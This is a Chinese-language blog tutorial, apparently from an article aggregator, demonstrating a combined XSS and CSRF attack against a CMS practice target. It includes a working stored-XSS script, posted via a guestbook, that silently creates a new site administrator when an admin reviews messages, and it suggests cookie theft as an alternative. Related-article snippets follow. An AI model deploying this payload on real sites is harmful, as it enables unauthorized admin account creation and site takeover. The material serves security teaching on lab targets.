XSS+CSRF组合拳

2024-06-20 16:12
文章标签 xss csrf 组合拳

本文主要是介绍XSS+CSRF组合拳,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

简介

如何进行实战

进入后台创建一个新用户进行接口分析

构造注入代码

寻找XSS漏洞并注入

小结


简介

(案例中将使用cms靶场来进行演示)

在实战中CSRF利用条件十分苛刻,因为我们需要让受害者点击我们的恶意请求不是一件容易的事情 。所以单单一个CSRF漏洞危害是很小的,所以我们为了扩大危害,就需要借助XSS漏洞与之配合 。我们利用XSS漏洞让受害者执行JS代码,JS代码有发起请求的功能,借此功能我们配合CSRF漏洞达成我们的攻击。我们利用XSS执行JS代码的时候发起我们构造的恶意请求,从而能达到让受害者无感知地受到攻击。

如何通过js发起请求,具体来说有以下步骤

  1. 创建 XMLHttpRequest 实例

  2. 发出 HTTP 请求

  3. 接收服务器传回的数据

  4. 更新网页数据

如何进行实战

  1. 分析功能点的请求接口,构造恶意请求(创建网站后台管理员账密)

  2. 编写发起恶意请求的恶意JS

  3. 寻找XSS漏洞

  4. 使用恶意的JS进行XSS攻击 

进入后台创建一个新用户进行接口分析

构造注入代码

根据刚刚抓到的包构造创建一个新管理员的代码

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","添加管理员的页面",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=test&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

寻找XSS漏洞并注入

载我安装的cms中发现有留言板尝试注入,将刚刚编写好的注入代码插入到输入框,留言页面的输入框都可以尝试注入

留言成功

 现在我们到后台模拟管理员审核

(现在是没有管理员的)

 管理员查看留言

现在再看管理员界面发现多了一个管理员正是我们模拟创建的管理员

小结

你的xss漏洞打到网站后台,并不一定要添加管理员,你也可以抓取管理员的cookie。本次攻击的最大工臣还是xss漏洞,没有xss漏洞这次攻击是无从谈起的。

这个漏洞在如今已经已经几乎不存在了,因为csrf很好防御。


不嫌弃的点点关注,点点赞 ଘ(੭ˊᵕˋ)੭* ੈ✩‧₊˚

这篇关于XSS+CSRF组合拳的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1078621

相关文章

xss-labs-master通关教程

一.level1 先来进行一下代码审计 <?php ini_set("display_errors", 0);//关闭错误显示$str = $_GET["name"]; //接受URL来的get形式的name传参echo "<h2 align=center>欢迎用户".$str."</h2>";//在网页输出,并不是echo执行的,而是echo把HTML代码发送到浏览器,浏览器对发送的H

Web安全之XSS跨站脚本攻击:如何预防及解决

1. 什么是XSS注入 XSS(跨站脚本攻击,Cross-Site Scripting)是一种常见的Web安全漏洞,通过注入恶意代码(通常是JavaScript)到目标网站的网页中,以此在用户浏览网页时执行。攻击者可以通过XSS获取用户的敏感信息(如Cookie、会话令牌)或控制用户浏览器的行为,进而造成信息泄露、身份冒用等严重后果。 2. XSS攻击类型 2.1 存储型XSS 存储型XS

【前端安全】浅谈XSS攻击和防范

定义 XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 分类 大分类小分类原理非存储DOM型① 不需要经过服务器

XSS 漏洞检测与利用全解析:守护网络安全的关键洞察

在网络安全领域,跨站脚本攻击(XSS)是一种常见的安全漏洞。XSS 漏洞可以让攻击者在受害者的浏览器中执行恶意脚本,从而窃取用户的敏感信息、篡改页面内容或者进行其他恶意操作。本文将介绍 XSS 漏洞的检测和利用方法。 一、XSS 漏洞的概念和类型 (一)概念 跨站脚本攻击(XSS)是指攻击者在网页中注入恶意脚本,当用户访问该网页时,恶意脚本在用户的浏览器中执行,从而达到攻击的目的。 (

经验笔记:跨站脚本攻击(Cross-Site Scripting,简称XSS)

跨站脚本攻击(Cross-Site Scripting,简称XSS)经验笔记 跨站脚本攻击(XSS:Cross-Site Scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者将恶意脚本注入到看起来来自可信网站的网页上。当其他用户浏览该页面时,嵌入的脚本就会被执行,从而可能对用户的数据安全构成威胁。XSS攻击通常发生在Web应用程序未能充分过滤用户提交的数据时,导致恶意脚本得以传递

常见PHP框架CSRF防范方案分析

什么是CSRF CSRF(跨站请求伪造)是一种恶意的攻击,它凭借已通过身份验证的用户身份来运行未经过授权的命令。网上有很多相关介绍了,具体攻击方式就不细说了,下面来说说Laravel和Yii2是如何来做CSRF攻击防范的。 Laravel CSRF防范 本次对Laravel CSRF防范源码的分析是基于5.4.36版本的,其他版本代码可能有所不同,但原理是相似的。 Laravel通过中间件

XSS基础了解和解决方案

主要内容 什么是XSS?XSS的危害有哪些?常见的XSS漏洞如何防范XSS? 什么是XSS? 跨站脚本攻击(Cross Site Scripting),是一种 Web 应用程序的漏洞,当来自用户的不可信数据被应用程序在没有验证以及反射回浏览器而没有进行编码或转义的情况下进行了处理,导致浏览器引擎执行了代码。 XSS的危害有哪些? 盗取各类用户帐号,如机器登录帐号、用户

【网络安全】Self XSS + 文件上传CSRF

未经许可,不得转载。 文章目录 正文发现反射点实现XSS跨站请求伪造 (CSRF) 与文件上传结合POC 正文 在目标网站 target.com 的“联系我们”表单中,我注意到一个文件上传选项。 我最初输入了一个随机字符串,如 123xss,结果发现服务器没有对这个字符串进行足够的处理,比如转义或过滤,而是将其直接反射到网页中并展示给用户。 于是,我尝试注入XSS

57-java csrf防御方案

CSRF(跨站请求伪造)是一种攻击手段,它迫使已登录用户的web应用在没有用户知情的情况下,发送未经授权的请求。在Java中,有多种方法可以用来防御CSRF攻击。 使用同步令牌(Token): 同步令牌是一种通过在表单中插入一个随机生成的令牌来确保表单提交的安全性的方法。当用户请求一个创建表单的页面时,服务器会生成一个唯一的令牌,并将其保存在session中,然后在表单中插入这个令牌。当用

【web安全】XSS篇

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【web安全】XSS篇 简介原理危害 分类反射性XSS存储型XSSDOM XSS(特殊的反射XSS) 测试工具手工 防护绕过前端限制绕过大小写绕过双写绕过编码注释干扰后台绕过标签语法替换提交方式更改垃圾数据溢出结合其他漏洞绕过HTTPonly绕过针对HTML实体化绕过上传非图片导